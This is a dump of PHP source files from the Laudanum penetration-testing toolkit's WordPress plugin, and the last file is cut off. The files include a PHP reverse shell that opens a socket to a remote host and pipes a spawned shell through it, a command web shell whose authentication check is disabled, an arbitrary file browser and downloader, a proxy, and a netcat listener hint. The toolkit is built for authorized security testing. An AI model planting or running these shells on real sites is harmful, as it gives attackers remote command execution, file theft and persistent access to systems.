*** Written by Tim Medin 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | include 'ipcheck.php'; 41 | 42 | 43 | /* This error handler will turn all notices, warnings, and errors into fatal 44 | * errors, unless they have been suppressed with the @-operator. */ 45 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 46 | /* The @-opertor (used with chdir() below) temporarely makes 47 | * error_reporting() return zero, and we don't want to die in that case. 48 | * We do note the error in the output, though. */ 49 | if (error_reporting() == 0) { 50 | $_SESSION['output'] .= $errstr . "\n"; 51 | } else { 52 | die(' 54 | 55 | 56 | Laudanum PHP DNS Access 57 | 58 | 59 |

Fatal Error!

60 |

' . $errstr . '

61 |

in ' . $errfile . ', line ' . $errline . '.

62 | 63 |
64 |
65 | Copyright © 2014, Kevin Johnson and the Laudanum team.
66 | Written by Tim Medin.
67 | Get the latest version at laudanum.secureideas.net. 68 |
69 | 70 | 71 | '); 72 | } 73 | } 74 | 75 | set_error_handler('error_handler'); 76 | 77 | 78 | /* Initialize some variables we need again and again. */ 79 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 80 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 81 | ?> 82 | 84 | 85 | 86 | Laudanum PHP DNS Access 87 | 88 | 89 | 94 | 95 | 96 | 97 |

DNS Query 0.1

98 |
99 |
100 | DNS Lookup: 101 |

Query: 102 | Type: 117 | 118 |

119 |
120 | 121 | 122 | "; 127 | echo "Result = "; 128 | print_r($result); 129 | echo "Auth NS = "; 130 | print_r($authns); 131 | echo "Additional = "; 132 | print_r($addtl); 133 | echo ""; 134 | } 135 | ?> 136 |
137 |
138 | Copyright © 2014, Kevin Johnson and the Laudanum team.
139 | Written by Tim Medin.
140 | Get the latest version at laudanum.secureideas.net. 141 |
142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/file.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file allows browsing of the file system. 20 | *** Written by Tim Medin 21 | *** 22 | *** 12/28/2013 - updated by Jason Gillam - fixed parent folder. 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | include 'ipcheck.php'; 44 | 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. */ 49 | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP File Browser 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |
68 |
69 | Copyright © 2014, Kevin Johnson and the Laudanum team.
70 | Written by Tim Medin.
71 | Get the latest version at laudanum.secureideas.net. 72 |
73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | //set_error_handler('error_handler'); 80 | 81 | 82 | /* Initialize some variables we need again and again. */ 83 | $dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; 84 | $file = isset($_GET["file"]) ? $_GET["file"] : ""; 85 | 86 | if ($file != "") { 87 | if(file_exists($file)) { 88 | 89 | $s = split("/", $file); 90 | $filename = $s[count($s) - 1]; 91 | header("Content-type: application/x-download"); 92 | header("Content-Length: ".filesize($file)); 93 | header("Content-Disposition: attachment; filename=\"".$filename."\""); 94 | readfile($file); 95 | die(); 96 | } 97 | } 98 | ?> 99 | 101 | 102 | 103 | Laudanum File Browser 104 | 105 | 106 | 108 | 109 | 110 | 111 |

Laudanum File Browser 0.1

112 | Home
113 | 114 | Directory listing of / "; 123 | $breadcrumb = '/'; 124 | foreach ($dirs as $d) { 125 | if ($d != '') { 126 | $breadcrumb .= $d . "/"; 127 | echo "$d/ "; 128 | } 129 | } 130 | echo ""; 131 | 132 | // translate .. to a real dir 133 | $parentdir = ""; 134 | for ($i = 0; $i < count($dirs) - 2; $i++) { 135 | $parentdir .= $dirs[$i] . "/"; 136 | } 137 | 138 | echo ""; 139 | echo ""; 140 | echo ""; 141 | 142 | //get listing, separate into directories and files 143 | $listingfiles = array(); 144 | $listingdirs = array(); 145 | 146 | if ($handle = @opendir($curdir)) { 147 | while ($o = readdir($handle)) { 148 | if ($o == "." || $o == "..") continue; 149 | if (@filetype($curdir . $o) == "dir") { 150 | $listingdirs[] = $o . "/"; 151 | } 152 | else { 153 | $listingfiles[] = $o; 154 | } 155 | } 156 | 157 | @natcasesort($listingdirs); 158 | @natcasesort($listingfiles); 159 | 160 | //display directories 161 | foreach ($listingdirs as $f) { 162 | echo ""; 163 | } 164 | 165 | //display files 166 | foreach ($listingfiles as $f) { 167 | echo ""; 168 | } 169 | } 170 | else { 171 | echo ""; 172 | } 173 | ?> 174 |
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

175 |
176 |
177 | Copyright © 2014, Kevin Johnson and the Laudanum team.
178 | Written by Tim Medin.
179 | Get the latest version at laudanum.secureideas.net. 180 |
181 | 182 | 183 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/host.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a host lookup by ip address. 20 | *** Written by Jason Gillam 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | include 'ipcheck.php'; 41 | 42 | 43 | /* This error handler will turn all notices, warnings, and errors into fatal 44 | * errors, unless they have been suppressed with the @-operator. */ 45 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 46 | /* The @-opertor (used with chdir() below) temporarely makes 47 | * error_reporting() return zero, and we don't want to die in that case. 48 | * We do note the error in the output, though. */ 49 | if (error_reporting() == 0) { 50 | $_SESSION['output'] .= $errstr . "\n"; 51 | } else { 52 | die(' 54 | 55 | 56 | Laudanum PHP Hostname by IP Lookup 57 | 58 | 59 |

Fatal Error!

60 |

' . $errstr . '

61 |

in ' . $errfile . ', line ' . $errline . '.

62 | 63 |
64 |
65 | Copyright © 2014, Kevin Johnson and the Laudanum team.
66 | Written by Tim Medin.
67 | Get the latest version at laudanum.secureideas.net. 68 |
69 | 70 | 71 | '); 72 | } 73 | } 74 | 75 | set_error_handler('error_handler'); 76 | 77 | 78 | /* Initialize some variables we need again and again. */ 79 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 80 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 81 | ?> 82 | 84 | 85 | 86 | Laudanum Host Lookup 87 | 88 | 89 | 94 | 95 | 96 | 97 |

Host Lookup 0.1

98 |
99 |
100 | Host Lookup: 101 |

IP: 102 | 103 | 104 |

105 |
106 | 107 | 108 | "; 113 | echo "Result = "; 114 | print_r($result); 115 | echo ""; 116 | } 117 | ?> 118 |
119 |
120 | Copyright © 2014, Kevin Johnson and the Laudanum team.
121 | Written by Tim Medin.
122 | Get the latest version at laudanum.secureideas.net. 123 |
124 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/ipcheck.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools 20 | *** by someone other than the person who uploaded Laudanum. This file should be included 21 | *** in other Laudanum tools and not called directly. 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | // ***************** Config entries below *********************** 44 | // IPs are enterable as individual addresses TODO: add CIDR support 45 | $wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1"); 46 | 47 | 48 | # *********** No editable content below this line ************** 49 | 50 | $wpl_allowed = 0; 51 | foreach ($wpl_allowedIPs as $IP) { 52 | if ($_SERVER["REMOTE_ADDR"] == $IP) 53 | $wpl_allowed = 1; 54 | } 55 | 56 | if ($wpl_allowed == 0) { 57 | header("HTTP/1.0 404 Not Found"); 58 | die(); 59 | } 60 | 61 | ?> -------------------------------------------------------------------------------- /laudanum/wordpress/templates/killnc.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file attempts to kill all netcat processes spawned by the current user. 20 | *** This may be useful in cases where a reverse shell attempt has gone wrong. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | include 'ipcheck.php'; 44 | 45 | 46 | /* This error handler will turn all notices, warnings, and errors into fatal 47 | * errors, unless they have been suppressed with the @-operator. */ 48 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 49 | /* The @-opertor (used with chdir() below) temporarely makes 50 | * error_reporting() return zero, and we don't want to die in that case. 51 | * We do note the error in the output, though. */ 52 | if (error_reporting() == 0) { 53 | $_SESSION['output'] .= $errstr . "\n"; 54 | } else { 55 | die(' 57 | 58 | 59 | Laudanum PHP Hostname by IP Lookup 60 | 61 | 62 |

Fatal Error!

63 |

' . $errstr . '

64 |

in ' . $errfile . ', line ' . $errline . '.

65 | 66 |
67 |
68 | Copyright © 2014, Kevin Johnson and the Laudanum team.
69 | Written by Tim Medin.
70 | Get the latest version at laudanum.secureideas.net. 71 |
72 | 73 | 74 | '); 75 | } 76 | } 77 | 78 | set_error_handler('error_handler'); 79 | 80 | 81 | 82 | ?> 83 | 85 | 86 | 87 | Laudanum Kill nc 88 | 89 | 90 | 91 | 92 |

Kill nc 0.1

93 | 94 | 95 |
96 |
97 | Copyright © 2014, Kevin Johnson and the Laudanum team.
98 | Written by Tim Medin.
99 | Get the latest version at laudanum.secureideas.net. 100 |
101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 111 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 112 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 113 | ); 114 | 115 | $process = proc_open($shell, $descriptorspec, $pipes); 116 | 117 | if (!is_resource($process)) { 118 | printit("ERROR: Can't spawn shell"); 119 | exit(1); 120 | } 121 | 122 | // Set everything to non-blocking 123 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 124 | stream_set_blocking($pipes[0], 0); 125 | stream_set_blocking($pipes[1], 0); 126 | stream_set_blocking($pipes[2], 0); 127 | stream_set_blocking($sock, 0); 128 | 129 | printit("Successfully opened reverse shell to $ip:$port"); 130 | 131 | while (1) { 132 | // Check for end of TCP connection 133 | if (feof($sock)) { 134 | printit("ERROR: Shell connection terminated"); 135 | break; 136 | } 137 | 138 | // Check for end of STDOUT 139 | if (feof($pipes[1])) { 140 | printit("ERROR: Shell process terminated"); 141 | break; 142 | } 143 | 144 | // Wait until a command is end down $sock, or some 145 | // command output is available on STDOUT or STDERR 146 | $read_a = array($sock, $pipes[1], $pipes[2]); 147 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 148 | 149 | // If we can read from the TCP socket, send 150 | // data to process's STDIN 151 | if (in_array($sock, $read_a)) { 152 | if ($debug) printit("SOCK READ"); 153 | $input = fread($sock, $chunk_size); 154 | if ($debug) printit("SOCK: $input"); 155 | fwrite($pipes[0], $input); 156 | } 157 | 158 | // If we can read from the process's STDOUT 159 | // send data down tcp connection 160 | if (in_array($pipes[1], $read_a)) { 161 | if ($debug) printit("STDOUT READ"); 162 | $input = fread($pipes[1], $chunk_size); 163 | if ($debug) printit("STDOUT: $input"); 164 | fwrite($sock, $input); 165 | } 166 | 167 | // If we can read from the process's STDERR 168 | // send data down tcp connection 169 | if (in_array($pipes[2], $read_a)) { 170 | if ($debug) printit("STDERR READ"); 171 | $input = fread($pipes[2], $chunk_size); 172 | if ($debug) printit("STDERR: $input"); 173 | fwrite($sock, $input); 174 | } 175 | } 176 | 177 | fclose($sock); 178 | fclose($pipes[0]); 179 | fclose($pipes[1]); 180 | fclose($pipes[2]); 181 | proc_close($process); 182 | 183 | // Like print, but does nothing if we've daemonised ourself 184 | // (I can't figure out how to redirect STDOUT like a proper daemon) 185 | function printit ($string) { 186 | if (!$daemon) { 187 | print "$string\n"; 188 | } 189 | } 190 | 191 | ?> 192 | 193 | 194 | 195 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/proxy.php: -------------------------------------------------------------------------------- 1 | 15 | *** 16 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 17 | *** 18 | ******************************************************************************** 19 | *** 20 | *** This file acts as a browser-based proxy. 21 | *** Written by Tim Medin 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page 42 | // figure out how to reuse sessionid from the remote site 43 | 44 | include 'ipcheck.php'; 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. */ 49 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP Proxy 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |
68 |
69 | Copyright © 2014, Kevin Johnson and the Laudanum team.
70 | Written by Tim Medin.
71 | Get the latest version at laudanum.secureideas.net. 72 |
73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | set_error_handler('error_handler'); 80 | 81 | function geturlarray($u) { 82 | // creates the url array, addes a scheme if it is missing and retries parsing 83 | $o = parse_url($u); 84 | if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } 85 | if (!isset($o["path"])) { $o["path"] = "/"; } 86 | return $o; 87 | } 88 | 89 | function buildurl ($u) { 90 | // build the url from the url array 91 | // this is used because the built in function isn't 92 | // avilable in all installs of php 93 | if (!isset($u["host"])) { return null; } 94 | 95 | $s = isset($u["scheme"]) ? $u["scheme"] : "http"; 96 | $s .= "://" . $u["host"]; 97 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 98 | $s .= isset($u["path"]) ? $u["path"] : "/"; 99 | $s .= isset($u["query"]) ? "?" . $u["query"] : ""; 100 | $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; 101 | return $s; 102 | } 103 | 104 | function buildurlpath ($u) { 105 | //gets the full url and attempts to remove the file at the end of the url 106 | // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ 107 | if (!isset($u["host"])) { return null; } 108 | 109 | $s = isset($u["scheme"])? $u["scheme"] : "http"; 110 | $s .= "://" . $u["host"]; 111 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 112 | 113 | $path = isset($u["path"]) ? $u["path"] : "/"; 114 | // is the last portion of the path a file or a dir? 115 | // assume if there is a . it is a file 116 | // if it ends in a / then it is a dir 117 | // if neither, than assume dir 118 | $dirs = explode("/", $path); 119 | $last = $dirs[count($dirs) - 1]; 120 | if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { 121 | // its a file, remove the last chunk 122 | $path = substr($path, 0, -1 * strlen($last)); 123 | } 124 | 125 | $s .= $path; 126 | return $s; 127 | } 128 | 129 | function getfilename ($u) { 130 | // returns the file name 131 | // e.g. http://blah.com/dir/file.ext returns file.ext 132 | // technically, it is the last portion of the url, so there is a potential 133 | // for a problem if a http://blah.com/dir returns a file 134 | $s = explode("/", $u["path"]); 135 | return $s[count($s) - 1]; 136 | } 137 | 138 | function getcontenttype ($headers) { 139 | // gets the content type 140 | foreach($headers as $h) { 141 | if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { 142 | return $out[1][0]; 143 | } 144 | } 145 | } 146 | 147 | function getcontentencoding ($headers) { 148 | foreach ($headers as $h) { 149 | if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { 150 | return $out[1][0]; 151 | } 152 | } 153 | } 154 | 155 | function removeheader($header, $headers) { 156 | foreach (array_keys($headers) as $key) { 157 | if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { 158 | unset($headers[$key]); 159 | return $headers; 160 | } 161 | } 162 | } 163 | 164 | function rewritecookies($headers) { 165 | // removes the path and domain from cookies 166 | for ($i = 0; $i < count($headers); $i++) { 167 | if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { 168 | $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); 169 | $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); 170 | } 171 | } 172 | return $headers; 173 | } 174 | 175 | function getsessionid($headers) { 176 | for ($i = 0; $i < count($headers); $i++) { 177 | if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) 178 | return $out[1][0]; 179 | } 180 | return "0"; 181 | } 182 | 183 | function compatible_gzinflate($gzData) { 184 | if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { 185 | $i = 10; 186 | $flg = ord( substr($gzData, 3, 1) ); 187 | if ( $flg > 0 ) { 188 | if ( $flg & 4 ) { 189 | list($xlen) = unpack('v', substr($gzData, $i, 2) ); 190 | $i = $i + 2 + $xlen; 191 | } 192 | if ( $flg & 8 ) 193 | $i = strpos($gzData, "\0", $i) + 1; 194 | if ( $flg & 16 ) 195 | $i = strpos($gzData, "\0", $i) + 1; 196 | if ( $flg & 2 ) 197 | $i = $i + 2; 198 | } 199 | return @gzinflate( substr($gzData, $i, -8) ); 200 | } else { 201 | return false; 202 | } 203 | return false; 204 | } 205 | 206 | function rewrite ($d, $u) { 207 | $r = $d; 208 | //rewrite images and links - absolute reference 209 | $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); 210 | //rewrite images and links - hard linked 211 | $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); 212 | //rewrite images and links - relative reference 213 | $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); 214 | 215 | 216 | //rewrite form - absolute reference 217 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 218 | //rewrite form - hard linked 219 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 220 | //rewrite form - relative reference 221 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 222 | return $r; 223 | } 224 | 225 | /* Initialize some variables we need again and again. */ 226 | $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; 227 | if ($url == "") { 228 | $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; 229 | } 230 | 231 | if ($url == "") { 232 | ?> 233 | 235 | 236 | 237 | Laudanum PHP Proxy 238 | 239 | 240 | 245 | 246 | 247 | 248 |

Laudanum PHP Proxy

249 | 250 |
251 | 252 | 253 |
254 |
255 |
256 | Copyright © 2014, Kevin Johnson and the Laudanum team.
257 | Written by Tim Medin.
258 | Get the latest version at laudanum.secureideas.net. 259 |
260 | 261 | 262 | 263 | 337 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/settings.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a convenient menu of Laudanum tools from a Word Press settings 20 | *** page. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | ?> 42 | 43 | 44 |
45 |

Laudanum Tools

46 | 65 | * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" 66 |
67 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/shell.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides shell access to the system. It is built based on the 2.1 20 | *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler 21 | *** 22 | *** 23 | *** Updated by Tim Medin 24 | *** 25 | ******************************************************************************** 26 | *** This program is free software; you can redistribute it and/or 27 | *** modify it under the terms of the GNU General Public License 28 | *** as published by the Free Software Foundation; either version 2 29 | *** of the License, or (at your option) any later version. 30 | *** 31 | *** This program is distributed in the hope that it will be useful, 32 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | *** GNU General Public License for more details. 35 | *** 36 | *** You can get a copy of the GNU General Public License from this 37 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 39 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 40 | *** 41 | ***************************************************************************** */ 42 | 43 | 44 | include 'ipcheck.php'; 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. */ 49 | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP Shell Access 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |
68 |
69 | Copyright © 2014, Kevin Johnson and the Laudanum team.
71 | Get the latest version at laudanum.secureideas.net. 72 |
73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | // set_error_handler('wpl_error_handler'); 80 | 81 | 82 | function logout() { 83 | $_SESSION = array('authenticated' => false); 84 | if (isset($_COOKIE[session_name()])) 85 | setcookie(session_name(), '', time()-42000, '/'); 86 | session_destroy(); 87 | } 88 | 89 | 90 | function wpl_stripslashes_deep($value) { 91 | if (is_array($value)) 92 | return array_map('stripslashes_deep', $value); 93 | else 94 | return stripslashes($value); 95 | } 96 | 97 | if (get_magic_quotes_gpc()) 98 | $_POST = stripslashes_deep($_POST); 99 | 100 | /* Initialize some variables we need again and again. */ 101 | //$username = isset($_POST['username']) ? $_POST['username'] : ''; 102 | //$password = isset($_POST['password']) ? $_POST['password'] : ''; 103 | //$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; 104 | 105 | $command = isset($_POST['command']) ? $_POST['command'] : ''; 106 | $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; 107 | $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; 108 | 109 | 110 | ///* Default settings --- these settings should always be set to something. */ 111 | //$default_settings = array('home-directory' => '.'); 112 | 113 | ///* Merge settings. */ 114 | //$ini['settings'] = array_merge($default_settings, $ini['settings']); 115 | 116 | 117 | session_start(); 118 | 119 | /* Delete the session data if the user requested a logout. This leaves the 120 | * session cookie at the user, but this is not important since we 121 | * authenticates on $_SESSION['authenticated']. */ 122 | if (isset($_POST['logout'])) 123 | logout(); 124 | 125 | ///* Attempt authentication. */ 126 | //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 127 | // isset($ini['users'][$username])) { 128 | // if (strchr($ini['users'][$username], ':') === false) { 129 | // // No seperator found, assume this is a password in clear text. 130 | // $_SESSION['authenticated'] = ($ini['users'][$username] == $password); 131 | // } else { 132 | // list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); 133 | // $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); 134 | // } 135 | //} 136 | 137 | /* Attempt authentication. */ 138 | if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) 139 | $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); 140 | 141 | /* Enforce default non-authenticated state if the above code didn't set it 142 | * already. */ 143 | if (!isset($_SESSION['authenticated'])) 144 | $_SESSION['authenticated'] = false; 145 | 146 | if(true) { 147 | //if ($_SESSION['authenticated']) { 148 